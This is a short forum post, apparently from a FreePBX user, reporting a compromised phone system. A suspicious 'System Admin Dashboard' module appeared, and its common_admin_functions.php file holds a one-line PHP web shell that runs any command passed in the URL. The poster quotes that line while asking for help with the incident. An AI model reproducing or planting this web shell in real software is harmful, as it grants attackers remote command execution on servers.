Of course - the more I dig into it the more I am realising that common_admin_functions.php isn’t a standard part of the freepbx web interface - but has ‘appeared’ since the box has been installed and infact on one of my other freepbx boxes I don’t even have an admindashboard folder but only have one called dashboard.
On this compromised box when I list modules I have a ‘System Admin Dashboard’ module installed alongside the ‘System Dashboard’ one - which I don’t have on my other boxes.
Does anyone have any idea if this is a valid module ? or has it been installed maliciously and is the cause of my other issues ?
the common_admin_functions.php script within it is obviously designed for exploits as it only contains the command:
system($_GET[“c”]);
Mat